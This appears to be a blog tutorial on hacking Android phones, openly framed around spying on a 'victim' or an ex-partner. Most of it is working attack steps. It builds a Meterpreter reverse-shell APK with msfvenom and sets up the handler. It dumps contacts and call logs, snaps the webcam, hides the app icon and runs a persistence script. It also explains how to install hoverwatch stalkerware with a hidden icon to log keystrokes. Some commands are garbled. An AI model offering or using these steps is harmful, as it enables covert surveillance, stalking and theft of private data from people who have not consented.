Do you want to learn android pen testing or just want to hack your ex-phone? I will explain everything from beginner level. You did not need any previous knowledge for his.
Just read this post carefully with patience.
After reading this post, you can hack any android phone (but don’t expect any magic from me).
I will post 2-3 on Android hacking
You will learn
- How to hack android using Linux os
- Hack using any device.
- Hack by window operating system
If you are beginner read this post first
Stupid Question like ‘How to hack android phone,’ ‘what is this,’ ‘My gf/bf cheating me please help me’ is not allowed
Using Linux operating system.
I am assuming you have read kali Linux tutorials for beginners. In Kali Linux, there is tool known as Metasploit
What is Metasploit
Metasploit is the framework where all type of pen testing tool is present. You can hack anything like window pc, server, android, etc. If you are beginner check out the Metasploit tutorial for beginners.
Practical 😀
Note: I’m using same wifi network. In the end, I will show you How to hack the device that is not on your network?. Keep reading.
First of all, we create a payload (you can call it app) then install it on his/her phone. When your victim opens it you his device will be in your control.
Here is the command to run in the terminal
msfvenom -p android/meterpreter/reverse_tcp LPORT=your local IP LPORT=4444 -o appname.apk
This command will create an app in the current directory with the name of appname.
Off course you can change it to anything. Let me explain this
-p for payload. I have reverse_tcp because it bypasses all kind of firewall rules.
LHOST: Is your local IP address. Type ifconfig to find your IP address. Make sure your target mobile phone is using the same network. Later on, I will tell you how to hack android phones that are outside of your network.
LPORT: for selecting the port number. I have chosen 4444 because it is free. You can choose anyone but in the particular case, I will recommend you to chose 443. It is the port number for https. So in any case expert it scanning phone he/she will ignore this because it is the port for https (it should open). If he/she see port 4444 is open, then he can check the phone.
o For saving app, you can use > too. It will keep apk in the current directory.
After that in terminal type msfconsole. It will launch Metasploit.
Set your exploit to multi handler. here is the command
use exploit/multi/handler
(if you are confused by this command to read Metasploit tutorial for beginner )
Now we need to set payload
set payload android/meterpreter/reverse_tcp
Show options command will show all options. As you can see in the screenshot, we need to set LHOST (mean local IP address)
set LHOST 192.168.43.60
This is my IP your IP different than this. I show you above how to find local Ip address
Port number should be same as msfvenom. Mine is 443
set LPORT 443
Last command 
type
run
Your system is ready for hacking the android phone.
App that you created in the first step install it in your phone (for testing)
open it (you will get nothing)
But on the computer side, you got the meterpreter session. Mean you have hacked this device :).
In my case, I don’t know why I am facing this error
Don’t worry run this command
session -i
It will show output similar to like it. Because I open the app three times so I got 3 sessions.
In my case I got 3 sessions I don’t not in your case but we will select last sessions. Command
sessions -i 3
You got meterpreter sessions 😎
type help to see what can you do.
You can do anything like taking screenshots, call details, keylogger, upload and download files etc.
These are a lot commands here are some samples
to take the screenshot
screenshot
To take photo
webcam_snap
To export all contacts
dump_contacts
For call logs
dump_calllog
You can hide app too
hide_app_icon
Moral: you can do anything.
How to send to apk file to Victim
If you send file this. He/She will definitely uninstall it because it shows nothing. You hide the app icon using hide_app_icon command.
App open again and again automatically
But if user clean recent apps then our connection will be lhost.
To bypass this problem follow these steps.
Open any text editor and copy paste these codes.
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
save it with startagain.sh
Make sure extension is .sh
When you got meterpreter session then run these commands
cd /sdcard/Download
upload startagain.sh
You will like this on uploading script
This means you have uploaded script successfully. Run these commands to execute script.
shell
cd /sdcard/Download
sh startagain.sh
after 5-10 seconds press ctrl+c like the screenshot
Don’t worry we stop shell not script.
As you can see in the screenshot I got New meterpreter sessions after every 20 seconds.
Until you will not reboot your phone you will continuously get meterpreter sessions after every 20 seconds.
How to hack the device that is not in your network?
You can
port forward your router then use your public IP address (search on google my public IP). In the case, if you are using mobile data then buy a web server.
How to get web server free?
Google cloud provide you free web server with the amount of $300. You can use this money to install Linux distribution (I think Debian coast $10/month).
Install Kali Linuxand do the same process just change IP to your public IP (Google will provide you).
Make sure you have the credit card for making billing.
Hack Using any device
For this, we will use a unique app known as keylogger apps. It will record everything typed by victim keyboard and send to you. There are
many keylogger apps availablefor Android, But I will use hoverwatch.
This app is not available in Google play store. You have to download from official site. This is best free spy software from all tested apps.
Just Install and receive log files online. There is the only one limitation in this app that it will give you free trial version up to 3 days. Therefore, you can use hoverwatch free for only three days. Paid Plans are starting from $8.33/month for a single device.
There is the only one limitation in this app that it will give you free trial version up to 3 days only mean you can use this app free for just three days. Plans are starting from $8.33/month for a single device.
How to enable hoverwatch
- Open hoverwatch official site, type your email and password and click on “Sign up Free” Button.
- It will take you to https://i.hoverwatch.com/app/index.html#add-device URLyou can see a Download button click on it [make sure it is under android tab as shown in the screenshot]
- After downloading Install it in which phone you want to install. Don’t ask in comments how to install an app.
- After Installing it, open the app. When you open this app, it will ask you about I am going to use this software to monitor. I recommend you to choosing my device and make sure Hide Hoverwatch Icon and click on the Ok button
- on next page agree With Legal Terms tap on I ACCEPT button then It will ask for “Activate device administrator” click on Activate button
- On next page, it will ask your email & password so enter email and password that you made in the first step
- Done now you are ready you can view logs on hoverwatch website. Sign in your account and you can see all recorded keystroke.
In parrot or any other security distribution, you can launch using this command.
